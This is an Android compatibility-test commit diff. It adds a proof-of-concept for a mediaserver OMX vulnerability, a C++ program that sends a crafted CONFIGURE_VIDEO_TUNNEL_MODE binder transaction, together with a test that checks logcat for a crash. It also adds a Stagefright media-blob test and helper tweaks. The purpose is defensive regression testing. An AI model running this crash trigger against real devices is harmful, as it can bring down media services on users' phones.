Merge changes from topic "am-460dbfe8-8ec1-4f53-8922-e71d0e56778c" into oc-dev
* changes:
[automerger] [RESTRICT AUTOMERGE]: CTS test for Android Security CVE-2016-3835 am: 8007b33358 am: 073024cad3 am: 97c562a85c am: 657d2747ec skipped: 02c29b162a
[automerger] [RESTRICT AUTOMERGE]: CTS test for Android Security CVE-2016-3835 am: 8007b33358 am: 073024cad3 am: 97c562a85c am: 657d2747ec
[automerger] [RESTRICT AUTOMERGE]: CTS test for Android Security CVE-2016-3835 am: 8007b33358 am: 073024cad3 am: 97c562a85c
[automerger] [RESTRICT AUTOMERGE]: CTS test for Android Security CVE-2016-3835 am: 8007b33358 am: 073024cad3
[automerger] [RESTRICT AUTOMERGE]: CTS test for Android Security CVE-2016-3835 am: 8007b33358
[RESTRICT AUTOMERGE]: CTS test for Android Security CVE-2016-3835
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index e93c0b8..0466a7b 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -43,6 +43,7 @@
<!-- Bulletin 2016-04 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-2412->/data/local/tmp/CVE-2016-2412" />
+ <option name="push" value="CVE-2016-2413->/data/local/tmp/CVE-2016-2413" />
<option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" />
<option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2413/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2413/Android.mk
new file mode 100644
index 0000000..f5c397d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2413/Android.mk
@@ -0,0 +1,38 @@
+# Copyright (C) 2019 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-2413
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES += $(TOP)/frameworks/native/include/media/openmax
+
+LOCAL_SHARED_LIBRARIES := \
+ libbinder \
+ libutils \
+ libmedia \
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS += -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2413/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2413/poc.cpp
new file mode 100644
index 0000000..14e2d7b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2413/poc.cpp
@@ -0,0 +1,77 @@
+/**
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <media/IMediaPlayerService.h>
+#include <media/IOMX.h>
+
+using namespace android;
+
+#define CONFIGURE_VIDEO_TUNNEL_MODE 31
+#define ALLOCATE_NODE 4
+
+struct DummyOMXObserver : public BnOMXObserver {
+ public:
+ DummyOMXObserver() {}
+ virtual void onMessages(const std::list<omx_message> &) {}
+
+ protected:
+ virtual ~DummyOMXObserver() {}
+};
+
+int get_omx_node(sp<IOMX> omx) {
+ Parcel reply;
+ Parcel data;
+ int node = 0;
+ sp<DummyOMXObserver> expomx = new DummyOMXObserver();
+ data.writeInterfaceToken(omx.get()->IOMX::getInterfaceDescriptor());
+
+ data.writeCString("OMX.google.mp3.decoder");
+ data.writeStrongBinder(IInterface::asBinder(expomx));
+
+ sp<IBinder> binder = IInterface::asBinder(omx);
+ binder->transact(ALLOCATE_NODE, data, &reply);
+ status_t err = reply.readInt32();
+
+ if (err == OK) {
+ node = reply.readInt32();
+ } else {
+ node = 0xffff;
+ }
+ return node;
+}
+
+int main(void) {
+ sp<IOMX> omx =
+ interface_cast<IMediaPlayerService>(
+ defaultServiceManager()->getService(String16("media.player")))
+ ->getOMX();
+
+ Parcel reply, data;
+ int node = 0;
+
+ data.writeInterfaceToken(omx.get()->IOMX::getInterfaceDescriptor());
+
+ node = get_omx_node(omx);
+ data.writeInt32(node);
+ data.writeInt32(0xe4);
+ data.writeInt32(0x0);
+ data.writeInt32(2000);
+
+ sp<IBinder> binder = IInterface::asBinder(omx);
+ binder->transact(CONFIGURE_VIDEO_TUNNEL_MODE, data, &reply);
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
index 9a7e62a..424018d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
@@ -50,4 +50,16 @@
assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> system_server <<<",
logcatOut);
}
+
+ /*
+ * b/26403627
+ */
+ @SecurityTest(minPatchLevel = "Poc16_04")
+ public void testPocCVE_2016_2413() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-2413", getDevice(), 60);
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine(">>> /system/bin/mediaserver <<<" +
+ ".*?signal 11 \\(SIGSEGV\\)", logcat);
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
index b1ed666..99a4692 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -27,6 +27,7 @@
*/
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13286() throws Exception {
+ getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice());
}
@@ -36,6 +37,7 @@
*/
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13288() throws Exception {
+ getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13288", getDevice());
}
@@ -45,6 +47,7 @@
*/
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13289() throws Exception {
+ getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13289", getDevice());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
index 9364d28..69a4ed5 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
@@ -27,6 +27,7 @@
*/
@SecurityTest(minPatchLevel = "2018-05")
public void testPocCVE_2017_13315() throws Exception {
+ getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice());
}
@@ -36,6 +37,7 @@
*/
@SecurityTest(minPatchLevel = "2018-05")
public void testPocCVE_2017_13312() throws Exception {
+ getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/RegexUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/RegexUtils.java
index 3ab1829..9ce7e39 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/RegexUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/RegexUtils.java
@@ -25,6 +25,8 @@
import static org.junit.Assert.*;
public class RegexUtils {
+ private static final int TIMEOUT_DURATION = 20 * 60_000; // 20 minutes
+ private static final int WARNING_THRESHOLD = 1000; // 1 second
private static final int CONTEXT_RANGE = 100; // chars before/after matched input string
public static void assertContains(String pattern, String input) throws Exception {
@@ -46,7 +48,7 @@
private static void assertFind(
String pattern, String input, boolean shouldFind, boolean multiline) {
// The input string throws an error when used after the timeout
- TimeoutCharSequence timedInput = new TimeoutCharSequence(input, 60_000); // 1 minute
+ TimeoutCharSequence timedInput = new TimeoutCharSequence(input, TIMEOUT_DURATION);
Matcher matcher = null;
if (multiline) {
// DOTALL lets .* match line separators
@@ -62,7 +64,7 @@
boolean found = matcher.find();
long duration = System.currentTimeMillis() - start;
- if (duration > 1000) { // one second
+ if (duration > WARNING_THRESHOLD) {
// Provide a warning to the test developer that their regex should be optimized.
CLog.logAndDisplay(LogLevel.WARN, "regex match took " + duration + "ms.");
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
index 6ddd9f1..479f18d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
@@ -193,6 +193,12 @@
return Long.parseLong(uptime.substring(0, uptime.indexOf('.')));
}
+ public void safeReboot() throws DeviceNotAvailableException {
+ getDevice().nonBlockingReboot();
+ getDevice().waitForDeviceAvailable();
+ updateKernelStartTime();
+ }
+
/**
* Allows a test to pass if called after a planned reboot.
*/
diff --git a/tests/tests/security/res/raw/bug_73552574_avc.mp4 b/tests/tests/security/res/raw/bug_73552574_avc.mp4
new file mode 100644
index 0000000..1cca70c
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_73552574_avc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_73552574_framelen.mp4 b/tests/tests/security/res/raw/bug_73552574_framelen.mp4
new file mode 100644
index 0000000..36728cc
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_73552574_framelen.mp4
@@ -0,0 +1,93 @@
+48
+4
+28
+208
+0
+10
+39
+386
+8
+70
+6
+32
+31
+4
+8
+24
+10
+22
+12
+108
+9
+229
+38
+12
+10
+166
+39
+250
+43
+8
+70
+6
+29
+12
+4
+8
+33
+12
+0
+10
+156
+10
+39
+94
+10
+39
+386
+8
+70
+6
+10
+31
+4
+8
+24
+10
+22
+12
+70
+9
+420
+0
+8
+36
+6
+12
+20
+31
+102
+229
+38
+12
+10
+156
+10
+39
+197
+251
+38
+12
+10
+156
+10
+180
+10
+39
+386
+8
+70
+6
+32
+31
+6441
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 1ceb8d9..49b91ce 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -795,6 +795,12 @@
before any existing test methods
***********************************************************/
+ @SecurityTest(minPatchLevel = "2018-06")
+ public void testBug_73552574() throws Exception {
+ int[] frameSizes = getFrameSizes(R.raw.bug_73552574_framelen);
+ doStagefrightTestRawBlob(R.raw.bug_73552574_avc, "video/avc", 320, 240, frameSizes);
+ }
+
@SecurityTest(minPatchLevel = "2018-02")
public void testStagefright_bug_68342866() throws Exception {
Thread server = new Thread() {